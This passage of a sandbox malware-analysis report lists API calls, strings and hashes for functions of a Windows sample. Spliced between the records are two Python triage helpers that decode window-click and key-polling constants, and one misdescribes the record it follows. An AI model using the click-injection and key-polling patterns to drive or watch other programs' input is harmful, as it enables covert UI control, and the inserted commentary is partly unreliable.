                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                • API String ID: 3052893215-2127371420
                                                                                                                                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                • API String ID: 2295938435-2354261254
                                                                                                                                                                                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                • API String ID: 3038501623-2263619337
                                                                                                                                                                                                                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                                                                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: LoadString_wprintf$__swprintf_memmove_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2295938435-8599901
• Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
• Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
• Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
• Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
APIs
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(?), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
• Sleep.KERNEL32(000000FA), ref: 00443C2D
• IsWindow.USER32(?), ref: 00443C3A
• EndDialog.USER32(?,00000000), ref: 00443C4C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
• String ID: BUTTON
• API String ID: 1834419854-3405671355
• Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
• Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
• Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
• LoadStringW.USER32(00000000), ref: 00454040
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• _wprintf.LIBCMT ref: 00454074
• __swprintf.LIBCMT ref: 004540A3
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 455036304-4153970271
• Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
• Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
• Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
APIs
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
• SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
• SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
• _memmove.LIBCMT ref: 00467EB8
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
• _memmove.LIBCMT ref: 00467F6C
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
• SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
• String ID:
• API String ID: 2170234536-0
• Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
• Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
• Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
• Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
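The "APIs" listings above encode the interesting part of each function as raw hex arguments: the SendMessageW sequence earlier on this page (FindWindowExW for a BUTTON class, AttachThreadInput in a subcall, then messages 000000F5 and 00000010) and the GetAsyncKeyState/GetKeyState polling in the function listed next (arguments 000000A0, 000000A1, 00000011, 00000012, 0000005B). The following parser is an added example and is not part of the Joe Sandbox report or its IDA plugin. It reads lines in the listing format, decodes the constants with names taken from the Windows SDK headers (BM_CLICK is 0x00F5, WM_CLOSE is 0x0010, VK_LSHIFT is 0xA0, VK_RSHIFT is 0xA1, VK_CONTROL is 0x11, VK_MENU is 0x12, VK_LWIN is 0x5B) and turns the call sequence into triage observations. The sample lines are copied from the listings on this page; the class and function names (ApiCall, parse_listing, decode_constant, findings) are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Names from the Windows SDK headers for the raw constants seen in the listings.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK"}
VIRTUAL_KEYS = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
                0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# Lines copied verbatim from the "APIs" listings of this report (not constructed).
SAMPLE = """\
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(?), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(00000011), ref: 00453DEF
• Sleep.KERNEL32(000000FA), ref: 00443C2D
"""

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix,
# "Api.MODULE", optional "(args)", then "ref: XXXXXXXX".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for 8-digit hex constants, None for "?", str otherwise
    ref: int              # address of the call site
    subcall: Optional[int] = None   # address of the sub-function, if the line is indented


def parse_arg(raw: str):
    raw = raw.strip()
    if raw == "?":
        return None                      # sandbox could not resolve the value
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw                           # string literal such as BUTTON


def parse_listing(text: str) -> list[ApiCall]:
    """Parse every call line; headers such as 'APIs' or 'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Arguments are comma-separated; string literals on this page contain no commas.
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_constant(call: ApiCall) -> Optional[str]:
    """Name the one argument of a call that carries a well-known constant."""
    if call.api == "SendMessageW" and len(call.args) > 1 and isinstance(call.args[1], int):
        return WINDOW_MESSAGES.get(call.args[1], f"msg 0x{call.args[1]:04X}")
    if call.api in ("GetAsyncKeyState", "GetKeyState") and call.args and isinstance(call.args[0], int):
        return VIRTUAL_KEYS.get(call.args[0], f"vk 0x{call.args[0]:02X}")
    if call.api == "Sleep" and call.args and isinstance(call.args[0], int):
        return f"{call.args[0]} ms"
    return None


def findings(calls: list[ApiCall]) -> list[str]:
    """Triage observations that follow from the decoded call sequence."""
    apis = {c.api for c in calls}
    msgs = {c.args[1] for c in calls
            if c.api == "SendMessageW" and len(c.args) > 1 and isinstance(c.args[1], int)}
    keys = {c.args[0] for c in calls
            if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args and isinstance(c.args[0], int)}
    out = []
    if "AttachThreadInput" in apis and 0x00F5 in msgs:
        out.append("attaches to another thread's input queue, then sends BM_CLICK: "
                   "synthetic button click in a window it did not create")
    if 0x0010 in msgs:
        out.append("sends WM_CLOSE to a window handle")
    named = sorted(VIRTUAL_KEYS[k] for k in keys & set(VIRTUAL_KEYS))
    if named:
        out.append("polls modifier-key state: " + ", ".join(named))
    return out


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        via = f"[via {c.subcall:08X}] " if c.subcall is not None else ""
        note = decode_constant(c)
        print(f"{via}{c.api}.{c.module} @ {c.ref:08X}" + (f"  ; {note}" if note else ""))
    for f in findings(parsed):
        print("finding:", f)
```

Run against the full listing of a function rather than the eight sample lines, the same parser gives a quick answer to the question a triager asks of such a block: which window message or key code a raw argument stands for, and whether the calls together amount to driving another window's UI.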
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetKeyState.USER32(000000A1), ref: 00453DB5
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
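The record above lists five GetKeyState/GetAsyncKeyState calls whose first argument is a virtual-key code (0x11, 0x12, 0x5B). Reading those codes by hand across a long report is tedious, so the following is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the "• Name.MODULE(args), ref: ADDR" lines as rendered here (the CRT form without parentheses and the "Part of subcall function ADDR:" prefix are handled too), decodes the first argument against the winuser.h modifier-key table, and reports every poll of a modifier key with its call site. The line shapes it accepts and the sample text it is run on are assumptions copied from this listing, not a format Joe Sandbox documents. One caveat when reading the result: a function that polls only Ctrl, Alt and Win, as this one does at 00453DEF to 00453E5D, looks like a hotkey or modifier check; a polling keylogger would sweep most of the VK range, which this helper would surface as a long run of hits.

```python
"""Added example: parse the per-function "APIs" lists of a Joe Sandbox
function summary (as rendered in this report) and flag modifier-key polling.

Assumed line shapes (taken from this listing, not a documented format):
  "• Name.MODULE(arg,arg,...), ref: ADDR"
  "• _crtfunc.LIBCMT ref: ADDR"
  "  • Part of subcall function ADDR: Name.MODULE ref: ADDR"
"""
import re
from typing import Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Virtual-key codes of the modifier keys (values from winuser.h).
MODIFIER_VK = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
    0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}

# USER32 calls that read key state by polling rather than via a hook.
KEY_POLL_APIS = {"GetKeyState", "GetAsyncKeyState"}


def _parse_arg(token: str) -> Optional[int]:
    """'00000011' -> 0x11, '-000000FB' -> -0xFB, '?' (unresolved by the plugin) -> None."""
    token = token.strip()
    if not token or token == "?":
        return None
    return int(token, 16)


def parse_api_lines(text: str) -> list[dict]:
    """One record per recognised API line; headers and dump-source lines are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        records.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [] if raw_args is None else [_parse_arg(a) for a in raw_args.split(",")],
            "ref": int(m.group("ref"), 16),
            "subcall_of": None if m.group("parent") is None else int(m.group("parent"), 16),
        })
    return records


def modifier_key_polls(records: list[dict]) -> list[tuple[str, str, int]]:
    """(api, VK name, call site) for each GetKeyState/GetAsyncKeyState on a modifier key."""
    hits = []
    for r in records:
        if r["name"] in KEY_POLL_APIS and r["args"] and r["args"][0] in MODIFIER_VK:
            hits.append((r["name"], MODIFIER_VK[r["args"][0]], r["ref"]))
    return hits


# Constructed sample: the first record of this listing plus three lines copied
# in shape from later records (a '?' / negative argument, a CRT call, a subcall).
SAMPLE = """\
APIs
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
• _wcsncpy.LIBCMT ref: 00467490
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
Memory Dump Source
"""

if __name__ == "__main__":
    for api, vk, ref in modifier_key_polls(parse_api_lines(SAMPLE)):
        print(f"{ref:08X}: {api}({vk})")
```

Run it over any "APIs" block pasted from the report; a function whose hits cover dozens of distinct VK codes deserves a closer look than one that, like this record, only checks Ctrl, Alt and Win.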
APIs
• GetDlgItem.USER32(?,00000001), ref: 004357DB
• GetWindowRect.USER32(00000000,?), ref: 004357ED
• MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
• GetDlgItem.USER32(?,00000002), ref: 0043586A
• GetWindowRect.USER32(00000000,?), ref: 0043587C
• MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
• GetDlgItem.USER32(?,000003E9), ref: 004358DC
• GetWindowRect.USER32(00000000,?), ref: 004358EE
• MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
• GetDlgItem.USER32(?,000003EA), ref: 00435941
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
• Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
